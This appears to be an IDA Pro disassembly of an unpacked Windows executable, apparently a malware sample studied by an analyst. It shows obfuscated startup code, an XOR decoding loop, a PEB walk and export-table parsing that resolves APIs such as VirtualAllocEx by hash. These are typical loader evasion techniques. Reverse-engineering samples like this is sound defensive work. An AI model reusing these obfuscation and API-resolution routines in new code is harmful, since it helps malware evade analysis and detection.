;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 37DA677EEBB46FFF42E830FF39D10089
; File Name : u:\work\37da677eebb46fff42e830ff39d10089_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000036A ( 874.)
; Section size in file : 0000036A ( 874.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dword_401000 dd 77DF8F7Dh, 0 ; resolved to->ADVAPI32.RegCreateKeyWdword_401008 dd 7C809A72h, 0 ; resolved to->KERNEL32.VirtualAllocEx
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = byte ptr -8
arg_1E5C8A17 = byte ptr 1E5C8A1Fh
push ebp
mov ebp, esp
sub esp, 50h
shl ecx, 12h
mov eax, 0C9B51CEh
shl ecx, 15h
call sub_401120
mov ecx, edx
add edx, 23h
xor eax, eax
neg ecx
sub ecx, 0Dh
mov esi, edi
mov eax, 79D26010h
add edi, fs:[edx+ecx+2]
lea ecx, [ebp+arg_1E5C8A17]
push ecx
call sub_4010B0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_14]
push eax
call sub_401150
call sub_401190
lea eax, [ebp+var_8]
push eax
shl edx, 1
mov eax, ebx
add eax, 1E5C8A7Fh
push eax
add ecx, 0C346EB82h
push ecx
add esi, ebx
push esi
mov ecx, ebx
call sub_401200
push ebx
lea eax, ds:3CF9263Eh
lea ecx, [eax+ebx*2]
push [ebp+var_10]
push [ebp+var_14]
call ecx
mov ecx, 0E1A381BBh
push ecx
lea eax, [ebp+var_14]
push eax
mov eax, 30h
call sub_4012C0
leave
retn
start endp
; ---------------------------------------------------------------------------
db 8Dh
db 5
dd offset dword_401008
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010B0 proc near ; CODE XREF: start+35�p
push ebp
mov ebp, esp
mov ebx, eax
mov ecx, 12h
mov ebx, 7197D38h
add eax, 0A48A2B22h
xor ecx, ecx
shr ebx, 2
neg esi
push esi
lea esi, [esi+edi-1C6535Ah]
neg eax
lea ecx, [esi+ebx]
xor edx, edx
pop esi
add edi, esi
mov edx, eax
mov ecx, [ecx-3]
shr ecx, 18h
mov eax, ecx
add edx, ecx
lea ebx, byte_401100
sub edi, edx
and eax, 0F0h
add eax, 10h
shr eax, 8
add eax, ebx
push eax
retn
sub_4010B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
byte_401100 db 0CCh ; DATA XREF: sub_4010B0+39�o
; ---------------------------------------------------------------------------
mov ecx, [ebp+8]
mov [ecx+edx], edx
leave
retn 4
; ---------------------------------------------------------------------------
db 8Dh
db 5
dd offset dword_401000
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401120 proc near ; CODE XREF: start+11�p
push ebp
mov ebp, esp
add eax, 0F3A4BE3Ah
xor ecx, ecx
mov edx, 1
push ecx
push 0
shl edx, 3
push ecx
add edx, 4
push ecx
and ecx, 4
push ecx
xor ecx, ecx
call dword ptr [eax]
leave
retn
sub_401120 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401150 proc near ; CODE XREF: start+42�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 4
shl eax, 14h
push eax
sub eax, edx
mov ecx, 3CB934CAh
lea ecx, [ecx+edx*2]
add eax, ecx
mov ecx, 0FFFFFFD8h
add ecx, [eax+edx]
mov ebx, [ebp+arg_4]
mov [ebx], ecx
sub eax, 4
mov ebx, [ebp+arg_0]
mov ecx, [eax+edx]
pop eax
add eax, 28h
add ecx, eax
mov [ebx], ecx
leave
retn 8
sub_401150 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401190 proc near ; CODE XREF: start+47�p
push ebp
mov ebp, esp
mov ebx, edx
mov esi, 1E5C8A5Fh
add esi, edx
shl esi, 11h
add esi, 1E5C8A3Fh
lea ecx, [edx+edx]
neg ecx
add ecx, [esi+edx+0D0h]
leave
retn
sub_401190 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
mov esi, ebx
mov eax, 6BEB6DCh
mov ebx, [ebp+8]
mov ecx, [ebp+0Ch]
mov dword ptr [ebp-8], 304C891Bh
mov edx, 2
loc_4011DF: ; CODE XREF: .text:004011F8�j
xor [ebx], eax
sub ecx, 4
jle short locret_4011FA
lea edi, [edx+esi]
add eax, edi
add eax, [ebp-8]
lea ebx, [ebx+1E5C8A43h]
add ebx, esi
neg edx
jmp short loc_4011DF
; ---------------------------------------------------------------------------
locret_4011FA: ; CODE XREF: .text:004011E4�j
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401200 proc near ; CODE XREF: start+66�p
call sub_401220
call sub_401240
mov ebx, ecx
pop esi
call eax
push esi
retn
sub_401200 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401220 proc near ; CODE XREF: sub_401200�p
lea eax, [edi+ecx+79D25F4Dh]
mov eax, [eax-79D25F1Dh]
mov eax, [eax+0Ch]
mov eax, [eax+1Ch]
mov eax, [eax]
mov eax, [eax+8]
retn
sub_401220 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401240 proc near ; CODE XREF: sub_401200+5�p
var_1E5C8A44 = byte ptr -1E5C8A44h
var_8 = dword ptr -8
arg_3CB91472 = byte ptr 3CB9147Ah
push ebp
mov ebp, esp
sub esp, 8
mov ebx, eax
mov eax, ecx
lea esi, [ebx+3CB914BAh]
shl eax, 1
mov esi, [esi+eax]
add eax, 1E5C8A7Bh
lea esi, [ebx+eax]
sub esi, ecx
mov esi, [esi]
add esi, ebx
mov esi, [esi+78h]
add esi, ebx
lea edx, [esi+20h]
mov esi, [edx]
add esi, ebx
sub edx, 4
mov edi, [edx]
add edi, ebx
mov edx, 37A3EA24h
lea eax, [ebp-1E5C8A43h]
sub edx, ecx
sub eax, ecx
mov [eax], edx
xor edx, edx
mov [ebp+var_8], edx
loc_40128C: ; CODE XREF: sub_401240+6E�j
mov edx, [ebp+var_8]
lea eax, [esi+edx]
mov eax, [eax]
add eax, ebx
lea eax, [eax+1E5C8A4Bh]
lea edx, [ebp+arg_3CB91472]
mov edx, [edx+ecx*2]
cmp edx, [eax+ecx]
jz short loc_4012B0
add [ebp+var_8], 4
jmp short loc_40128C
; ---------------------------------------------------------------------------
loc_4012B0: ; CODE XREF: sub_401240+68�j
add edi, [ebp+var_8]
mov eax, [edi]
add eax, ebx
leave
retn
sub_401240 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012C0 proc near ; CODE XREF: start+8C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov ecx, 1E5C8A3Fh
lea ecx, [ecx+esi+0Ch]
mov edx, [ebp+ecx+0]
mov ebx, [ebp+arg_0]
add [ebx], eax
add edx, [ebx]
sub edx, esi
push edx
call dword ptr [ebx]
leave
retn 8
sub_4012C0 endp
; ---------------------------------------------------------------------------
dd 1324h, 2 dup(0)
dd 133Eh, 1008h, 131Ch, 2 dup(0)
dd 135Ch, 1000h, 5 dup(0)
dd 134Ch, 0
dd 132Ch, 0
dd 69560455h, 61757472h, 6C6C416Ch, 7845636Fh, 454B0000h
dd 4C454E52h, 642E3233h, 6C6Ch, 65520236h, 65724367h, 4B657461h
dd 577965h, 41564441h, 32334950h, 6C6C642Eh
db 2 dup(0)
dw ?
dd 25h dup(?)
_text ends
; Section 4. (virtual address 0000A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start